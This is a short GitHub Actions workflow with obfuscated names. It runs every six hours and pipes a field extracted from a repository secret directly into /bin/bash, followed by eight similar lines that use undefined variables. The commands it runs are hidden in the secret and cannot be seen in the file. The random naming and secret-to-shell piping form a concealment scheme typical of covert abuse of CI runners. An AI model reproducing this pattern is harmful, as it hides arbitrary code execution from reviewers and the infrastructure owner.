name: hanguofu6751

on:
  workflow_dispatch:
  schedule:
    - cron: '36 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: hanguofu6751
        env:
          tcbr7: ${{ secrets.tcbr7 }}
        run: |
          echo $tcbr7 | jq -r .eb918 | /bin/bash
          echo $wl39 | jq -r .kmvp309 | /bin/bash
          echo $dbezl0 | jq -r .trl54020 | /bin/bash
          echo $xfeek989 | jq -r .ybw5883 | /bin/bash
          echo $ye01 | jq -r .lggha5108 | /bin/bash
          echo $fkzze58 | jq -r .axsoj608 | /bin/bash
          echo $vbmc39222 | jq -r .rx2979 | /bin/bash
          echo $lu8 | jq -r .jt19 | /bin/bash
          echo $cfj1016 | jq -r .gzykr690 | /bin/bash

